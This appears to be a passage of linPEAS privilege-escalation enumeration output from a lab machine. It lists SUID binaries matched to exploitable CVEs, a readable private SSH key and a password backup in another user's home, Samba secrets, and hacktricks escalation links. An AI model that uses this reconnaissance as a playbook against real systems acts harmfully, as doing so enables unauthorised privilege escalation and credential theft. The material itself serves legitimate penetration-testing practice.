	refuse options = checksum dry-run
	dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz

[+] Looking for Hostapd config file
hostapd.conf Not Found

[+] Looking for wifi conns file
 Not Found

[+] Looking for Anaconda-ks config files
anaconda-ks.cfg Not Found

[+] Looking for .vnc directories and their passwd files
.vnc Not Found

[+] Looking for ldap directories and their hashes
/etc/ldap
The password hash is from the {SSHA} to 'structural'

[+] Looking for .ovpn files and credentials
.ovpn Not Found

[+] Looking for ssl/ssh files
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
Possible private SSH keys were found!
/home/kay/.ssh/id_rsa
 --> /etc/hosts.allow file found, read the rules:



Looking inside /etc/ssh/ssh_config for interesting info
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes
    GSSAPIDelegateCredentials no

[+] Looking for unexpected auth lines in /etc/pam.d/sshd
No

[+] Looking for Cloud credentials (AWS, Azure, GC)

[+] NFS exports?
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
/etc/exports Not Found

[+] Looking for kerberos conf files and tickets
[i] https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt
cat: /etc/krb5.conf: No such file or directory
tickets kerberos Not Found
klist Not Found

[+] Looking for Kibana yaml
kibana.yml Not Found

[+] Looking for Knock configuration
Knock.config Not Found

[+] Looking for logstash files
 Not Found

[+] Looking for elasticsearch files
 Not Found

[+] Looking for Vault-ssh files
vault-ssh-helper.hcl Not Found

[+] Looking for AD cached hashes
-rw------- 1 root root 430080 Apr 19  2018 /var/lib/samba/private/secrets.tdb

[+] Looking for screen sessions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
No Sockets found in /var/run/screen/S-jan.

[+] Looking for tmux sessions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
tmux Not Found

[+] Looking for Couchdb directory

[+] Looking for redis.conf

[+] Looking for dovecot files
dovecot credentials Not Found

[+] Looking for mosquitto.conf

[+] Looking for neo4j auth file

[+] Looking Cloud-Init conf file


====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/vim.basic
/usr/bin/pkexec		--->	Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/bin/newgrp		--->	HP-UX_10.20
/usr/bin/chfn		--->	SuSE_9.3/10
/usr/bin/sudo		--->	/sudo$
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/at		--->	RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/passwd		--->	Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
/bin/su
/bin/ntfs-3g		--->	Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
/bin/ping6
/bin/umount		--->	BSD/Linux(08-1996)
/bin/fusermount
/bin/mount		--->	Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/bin/ping

[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd
/usr/lib/x86_64-linux-gnu/utempter/utempter
/usr/lib/snapd/snap-confine
/usr/bin/crontab
/usr/bin/bsd-write
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/expiry
/usr/bin/wall
/usr/bin/screen		--->	GNU_Screen_4.5.0
/usr/bin/at		--->	RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/mlocate

[+] Writable folders configured in /etc/ld.so.conf.d/
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#etc-ld-so-conf-d
/usr/local/lib
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu/mesa

[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep

[+] Users with capabilities
/etc/security/capability.conf Not Found

[+] .sh files in path
/usr/bin/gettext.sh

[+] Unexpected folders in root
/samba

[+] Files (scripts) in /etc/profile.d/
total 24
drwxr-xr-x  2 root root 4096 Apr 17  2018 .
drwxr-xr-x 99 root root 4096 Nov 15  2018 ..
-rw-r--r--  1 root root  580 Nov 30  2017 apps-bin-path.sh
-rw-r--r--  1 root root  663 May 18  2016 bash_completion.sh
-rw-r--r--  1 root root 1003 Dec 29  2015 cedilla-portuguese.sh
-rw-r--r--  1 root root 1557 Apr 14  2016 Z97-byobu.sh

[+] Hashes inside passwd file? ........... No
[+] Hashes inside group file? ............ No
[+] Credentials in fstab/mtab? ........... No
[+] Can I read shadow files? ............. No
[+] Can I read root folder? .............. No

[+] Looking for root files in home dirs (limit 20)
/home
/home/jan
/home/jan/.lesshst
/home/kay/.viminfo
/home/kay/.lesshst

[+] Looking for others files in folders owned by me

[+] Readable files belonging to root and readable by me but not world readable

[+] Modified interesting files in the last 5mins
/etc/samba/dhcp.conf
/tmp/linepeas.txt
/tmp/linpeas.sh
/var/log/syslog
/var/log/auth.log
/var/log/kern.log

[+] Writable log files (logrotten)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation

[+] Files inside /home/jan (limit 20)
total 12
drwxr-xr-x 2 root root 4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 root jan    47 Apr 23  2018 .lesshst

[+] Files inside others home (limit 20)
/home/kay/.profile
/home/kay/.viminfo
/home/kay/.bashrc
/home/kay/.bash_history
/home/kay/.lesshst
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
/home/kay/.bash_logout
/home/kay/.sudo_as_admin_successful
/home/kay/pass.bak

[+] Looking for installed mail applications

[+] Mails (limit 50)

[+] Backup files?
-rw-r--r-- 1 root root 128 Apr 17  2018 /var/lib/sgml-base/supercatalog.old
-rw-r--r-- 1 root root 610 Apr 17  2018 /etc/xml/catalog.old
-rw-r--r-- 1 root root 673 Apr 17  2018 /etc/xml/xml-core.xml.old
-rw-r--r-- 1 root root 9542 Apr 19  2018 /etc/samba/smb.conf.bak
-rwxr-xr-x 1 root root 10504 Mar 14  2016 /usr/bin/tdbbackup.tdbtools

[+] Looking for tables inside readable .db/.sqlite files (limit 100)
 -> Extracting tables from /var/lib/nssdb/cert9.db (limit 20)

 -> Extracting tables from /var/lib/nssdb/key4.db (limit 20)


[+] Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x  3 root root 4.0K Apr 18  2018 .
drwxr-xr-x 14 root root 4.0K Apr 18  2018 ..
drwxr-xr-x  3 root root 4.0K Apr 23  2018 html

/var/www/html:
total 16K
drwxr-xr-x 3 root     root     4.0K Apr 23  2018 .
drwxr-xr-x 3 root     root     4.0K Apr 18  2018 ..

[+] Readable *_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .gitconfig, .git-credentials, .git, .svn, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data
-rw-r--r-- 1 kay kay 3771 Apr 17  2018 /home/kay/.bashrc
-rw-r--r-- 1 kay kay 655 Apr 17  2018 /home/kay/.profile
-rw-r--r-- 1 kay kay 0 Apr 17  2018 /home/kay/.sudo_as_admin_successful
-rwxr-xr-x 1 root root 484 Dec  9  2016 /usr/lib/initramfs-tools/etc/dhcp/dhclient-enter-hooks.d/config
-rw-r--r-- 1 root root 3106 Oct 22  2015 /usr/share/base-files/dot.bashrc
-rw-r--r-- 1 root root 3161 Apr 14  2016 /usr/share/byobu/profiles/bashrc
-rw-r--r-- 1 root root 870 Jul  2  2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/bash.bashrc
-rw-r--r-- 1 root root 1865 Jul  2  2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/skel/dot.bashrc

[+] All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 0 Apr 18  2018 /etc/.java/.systemPrefs/.system.lock
-rw-r--r-- 1 root root 0 Apr 18  2018 /etc/.java/.systemPrefs/.systemRootModFile
-rw-r--r-- 1 root root 220 Aug 31  2015 /etc/skel/.bash_logout
-rw------- 1 root root 0 Aug  1  2017 /etc/.pwd.lock
-rw-r--r-- 1 root root 1391 Apr 17  2018 /etc/apparmor.d/cache/.features
-rw-r--r-- 1 root root 0 Apr 30 02:35 /run/network/.ifstate.lock
-rw-r--r-- 1 root root 1319 Apr 17  2018 /var/lib/apparmor/profiles/.apparmor.md5sums
-rw-r--r-- 1 root root 155 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd
-rw-r--r-- 1 root root 333 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.purgatory.ro.cmd
-rw-r--r-- 1 root root 1374 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.setup-x86_64.o.cmd
-rw-r--r-- 1 root root 1304 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.stack.o.cmd
-rw-r--r-- 1 root root 9092 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.sha256.o.cmd
-rw-r--r-- 1 root root 3615 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.purgatory.o.cmd
-rw-r--r-- 1 root root 1324 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.entry64.o.cmd
-rw-r--r-- 1 root root 3529 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.string.o.cmd
-rw-r--r-- 1 root root 292 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd
-rw-r--r-- 1 root root 292 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd
-rw-r--r-- 1 root root 402 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd
-rw-r--r-- 1 root root 316 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.unistd_64_x32.h.cmd
-rw-r--r-- 1 root root 320 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.unistd_32_ia32.h.cmd
-rw-r--r-- 1 root root 320 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd
-rw-r--r-- 1 root root 315 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_32.h.cmd
-rw-r--r-- 1 root root 340 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_x32.h.cmd
-rw-r--r-- 1 root root 146 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs.cmd
-rw-r--r-- 1 root root 3342 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_common.o.cmd
-rw-r--r-- 1 root root 3362 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_32.o.cmd
-rw-r--r-- 1 root root 3362 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_64.o.cmd
-rw-r--r-- 1 root root 54037 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/kernel/.asm-offsets.s.cmd
-rw-r--r-- 1 root root 22 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/.21135.d
-rw-r--r-- 1 root root 3972 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.insert-sys-cert.cmd
-rw-r--r-- 1 root root 2839 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/selinux/mdp/.mdp.cmd
-rw-r--r-- 1 root root 3239 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/selinux/genheaders/.genheaders.cmd
-rw-r--r-- 1 root root 1193 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/basic/.bin2c.cmd
-rw-r--r-- 1 root root 4268 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/basic/.fixdep.cmd
-rw-r--r-- 1 root root 2391 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.conmakehash.cmd
-rw-r--r-- 1 root root 3253 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.asn1_compiler.cmd
-rw-r--r-- 1 root root 153 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.genksyms.cmd
-rw-r--r-- 1 root root 2719 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.genksyms.o.cmd
-rw-r--r-- 1 root root 2481 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.parse.tab.o.cmd
-rw-r--r-- 1 root root 3347 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.lex.lex.o.cmd
-rw-r--r-- 1 root root 3387 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.recordmcount.cmd
-rw-r--r-- 1 root root 4495 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.extract-cert.cmd
-rw-r--r-- 1 root root 2380 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.kallsyms.cmd
-rw-r--r-- 1 root root 3485 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.file2alias.o.cmd
-rw-r--r-- 1 root root 104 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.elfconfig.h.cmd
-rw-r--r-- 1 root root 4622 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.modpost.o.cmd
-rw-r--r-- 1 root root 4451 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.sumversion.o.cmd
-rw-r--r-- 1 root root 5191 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.devicetable-offsets.s.cmd
-rw-r--r-- 1 root root 2537 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.mk_elfconfig.cmd
-rw-r--r-- 1 root root 546 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.devicetable-offsets.h.cmd
-rw-r--r-- 1 root root 129 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.modpost.cmd
-rw-r--r-- 1 root root 2289 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.empty.o.cmd
-rw-r--r-- 1 root root 5133 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.sign-file.cmd
-rw-r--r-- 1 root root 3755 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.conf.o.cmd
-rw-r--r-- 1 root root 110 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.conf.cmd
-rw-r--r-- 1 root root 4917 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.zconf.tab.o.cmd
-rw-r--r-- 1 root root 3568 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.sortextable.cmd
-rw-r--r-- 1 root root 190243 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/.config
-rw-r--r-- 1 root root 190367 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/.config.old
-rw-r--r-- 1 root root 820 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/.missing-syscalls.d
-rw-r--r-- 1 root root 14210 Jul 18  2017 /usr/src/linux-headers-4.4.0-87-generic/kernel/.bounds.s.cmd
-rw-r--r-- 1 root root 155 Apr  2  2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd
-rw-r--r-- 1 root root 333 Apr  2  2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.purgatory.ro.cmd
-rw-r--r-- 1 root root 1379 Apr  2  2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.setup-x86_64.o.cmd
-rw-r--r-- 1 root root 1309 Apr  2  2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.stack.o.cmd
-rw-r--r-- 1 root root 9148 Apr  2  2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.sha256.o.cmd
-rw-r--r-- 1 root root 3615 Apr  2  2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.purgatory.o.cmd
-rw-r--r-- 1 root root 1329 Apr  2  2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.entry64.o.cmd
-rw-r--r-- 1 root root 3601 Apr  2  2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.string.o.cmd
-rw-r--r-- 1 root root 292 Apr  2  2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd

[+] Readable files inside /tmp, /var/tmp, /var/backups(limit 70)
-rw-rw-r-- 1 jan jan 80652 Apr 30 04:24 /tmp/linepeas.txt
-rwxr-xr-x 1 jan jan 213352 Apr 30 04:20 /tmp/linpeas.sh
-rw-r--r-- 1 root root 14659 Apr 23  2018 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 1458 Apr 18  2018 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 764 Apr 17  2018 /var/backups/apt.extended_states.2.gz

[+] Interesting writable files owned by me or writable by everyone (not in Home)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/mqueue/linpeas.txt
/dev/shm
/dev/shm/linpeas.txt
/run/lock
/run/screen/S-jan
/run/user/1001
/run/user/1001/systemd
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linepeas.txt
/tmp/linpeas.sh
/tmp/.Test-unix
/tmp/tmux-1001
/tmp/.X11-unix
/tmp/.XIM-unix
/var/crash
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/init.scope/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apache2.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apparmor.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apport.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/console-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-disk-by\x2duuid-db3bdca8\x2d5517\x2d4600\x2db896\x2de8479e05e44a.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-xvda5.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/grub-common.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/[email protected]/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/iscsid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/keyboard-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/kmod-static-nodes.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-monitor.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxd-containers.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/mdadm.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/-.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/networking.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/nmbd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ondemand.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/open-iscsi.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/polkitd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rc-local.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/resolvconf.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/run-user-1001.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/samba-ad-dc.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/setvtrgb.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/smbd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journal-flush.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-modules-load.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-random-seed.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-remount-fs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-sysctl.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udev-trigger.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-update-utmp.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-user-sessions.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-serial\x2dgetty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/tomcat.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ufw.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/var-lib-lxcfs.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope/cgroup.clone_children
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope/notify_on_release
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope/tasks
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/tasks
/var/spool/samba
/var/tmp

[+] Interesting GROUP writable files (not in Home)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
  Group jan:
/dev/mqueue/linpeas.txt
/dev/shm/linpeas.txt
/tmp/linepeas.txt

[+] Searching passwords in config PHP files

[+] Finding IPs inside logs (limit 70)
     80 /var/log/dpkg.log:1.16.04.1
     40 /var/log/dpkg.log:1.16.04.3
     25 /var/log/dpkg.log:1.16.04.2
     24 /var/log/dpkg.log:1.16.04.4
     21 /var/log/dpkg.log:2.16.04.1
     20 /var/log/dpkg.log:3.16.04.1
     15 /var/log/dpkg.log:3.16.04.3
     14 /var/log/wtmp:192.168.56.102
     10 /var/log/dpkg.log:6.16.04.1
     10 /var/log/apt/history.log:1.16.04.1
      9 /var/log/dpkg.log:2.29.4.2
      9 /var/log/dpkg.log:2.16.04.2
      6 /var/log/apt/history.log:1.16.04.3
      4 /var/log/wtmp:192.168.56.101
      4 /var/log/installer/status:1.2.3.3
      3 /var/log/apt/history.log:2.16.04.1
      3 /var/log/apt/history.log:1.16.04.4
      3 /var/log/apt/history.log:1.16.04.2
      2 /var/log/apt/history.log:3.16.04.1
      1 /var/log/wtmp:10.9.35.106
      1 /var/log/lastlog:192.168.56.102
      1 /var/log/lastlog:10.9.35.106
      1 /var/log/installer/status:2.21.63.3
      1 /var/log/apt/history.log:6.16.04.1
      1 /var/log/apt/history.log:3.16.04.3
      1 /var/log/apt/history.log:2.29.4.2
      1 /var/log/apt/history.log:2.16.04.2

[+] Finding passwords inside logs (limit 70)
/var/log/bootstrap.log: base-passwd depends on libc6 (>= 2.8); however:
/var/log/bootstrap.log: base-passwd depends on libdebconfclient0 (>= 0.145); however:
/var/log/bootstrap.log:dpkg: base-passwd: dependency problems, but configuring anyway as you requested:
/var/log/bootstrap.log:Preparing to unpack .../base-passwd_3.5.39_amd64.deb ...
/var/log/bootstrap.log:Preparing to unpack .../passwd_1%3a4.2-3.1ubuntu5_amd64.deb ...
/var/log/bootstrap.log:Selecting previously unselected package base-passwd.
/var/log/bootstrap.log:Selecting previously unselected package passwd.
/var/log/bootstrap.log:Setting up base-passwd (3.5.39) ...
/var/log/bootstrap.log:Setting up passwd (1:4.2-3.1ubuntu5) ...
/var/log/bootstrap.log:Shadow passwords are now on.
/var/log/bootstrap.log:Unpacking base-passwd (3.5.39) ...
/var/log/bootstrap.log:Unpacking base-passwd (3.5.39) over (3.5.39) ...
/var/log/bootstrap.log:Unpacking passwd (1:4.2-3.1ubuntu5) ...
/var/log/dpkg.log:2017-08-01 11:16:21 configure base-passwd:amd64 3.5.39 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 install base-passwd:amd64 <none> 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status half-installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status half-installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 upgrade base-passwd:amd64 3.5.39 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:28 install passwd:amd64 <none> 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:28 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:28 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:31 configure base-passwd:amd64 3.5.39 <none>
